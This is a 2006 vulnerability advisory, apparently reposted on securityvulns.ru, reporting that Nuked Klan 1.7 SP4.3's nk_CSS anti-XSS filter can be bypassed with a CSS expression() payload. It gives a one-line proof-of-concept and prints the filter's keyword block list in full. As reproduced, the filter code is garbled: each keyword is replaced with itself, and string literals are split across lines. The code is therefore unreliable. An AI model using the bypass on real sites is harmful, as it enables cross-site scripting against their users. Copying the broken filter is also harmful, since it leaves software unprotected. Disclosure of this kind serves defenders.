Security Advisory: Nuked Klan 1.7 SP4.3 : Function Anti-XSS Bypassed

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  [ECHO_ADV_46$2006] ExBB v1.9.1 (exbb[home_path])
Multiple Remote File Inclusion
  [SA21659] CubeCart Multiple Vulnerabilities
  phpAtm <= 1.21 (include_location
) Remote File Include Vulnerabilities
  YACS CMS <= 6.6.1 context[path_to_root]
Remote File Include Vuln

From: blwood_(at)_skynet.be <blwood_(at)_skynet.be>
Date: 31.08.2006
Subject: Nuked Klan 1.7 SP4.3 : Function Anti-XSS Bypassed

// *- BEGIN -*

// By Blwood
// http://blwood.net <http://blwood.net/>

We can bypassed the function anti-xss called nk_CSS ( nuked.php) using
like this :

<b id="blwood" style="width:expression(alert(' http://www.blwood.net'))
<http://www.blwood.net%27%29%29/>"></b>

Here is the function :

function nk_CSS($str)

{
   if ($str != "")
   {
       $str = eregi_replace("content-disposition:",
"content-dispo
sition:",$str);

       $str = eregi_replace("content-type:",
"content-type:
",$str);
       $str = eregi_replace("content-transfer-encoding:",
"content-trans
fer-encoding:"
,$str);

       $str = eregi_replace("include",
"include",$str);
       $str = eregi_replace("\<\?","<?",$str);
       $str = eregi_replace("<\?php","<?php",$str);

       $str = eregi_replace("\?\>","?>",$str);
       $str = eregi_replace("script",
"script",$str);
       $str = eregi_replace("eval","eval",
$str);

       $str = eregi_replace("javascript",
"javascript",
$str);
       $str = eregi_replace("embed","embed",
$str);

       $str = eregi_replace("iframe",
"iframe",$str);
       $str = eregi_replace("refresh", "refresh", $str);

       $str = eregi_replace("onload", "onload", $str);
       $str = eregi_replace("onstart", "onstart", $str);

       $str = eregi_replace("onerror", "onerror", $str);
       $str = eregi_replace("onabort", "onabort", $str);

       $str = eregi_replace("onblur", "onblur", $str);
       $str = eregi_replace("onchange", "onchange", $str);

       $str = eregi_replace("onclick", "onclick", $str);
       $str = eregi_replace("ondblclick", "ondblclick", $str);

       $str = eregi_replace("onfocus", "onfocus", $str);
       $str = eregi_replace("onkeydown", "onkeydown", $str);

       $str = eregi_replace("onkeypress", "onkeypress", $str);
       $str = eregi_replace("onkeyup", "onkeyup", $str);

       $str = eregi_replace("onmousedown", "onmousedown", $str);
       $str = eregi_replace("onmousemove", "onmousemove", $str);

       $str = eregi_replace("onmouseover", "onmouseover", $str);
       $str = eregi_replace("onmouseout", "onmouseout", $str);

       $str = eregi_replace("onmouseup", "onmouseup", $str);
       $str = eregi_replace("onreset", "onreset", $str);

       $str = eregi_replace("onselect", "onselect", $str);
       $str = eregi_replace("onsubmit", "onsubmit", $str);

       $str = eregi_replace("onunload", "onunload", $str);
       $str = eregi_replace("document", "document", $str);

       $str = eregi_replace("cookie", "cookie", $str);
       $str = eregi_replace("vbscript", "vbscript", $str);

       $str = eregi_replace("location", "location", $str);
       $str = eregi_replace("object", "object", $str);

       $str = eregi_replace("vbs", "vbs", $str);
       $str = eregi_replace("href", "href", $str);
       $str = eregi_replace("src", "src", $str);

   }
   return($str);
}

// *- END -*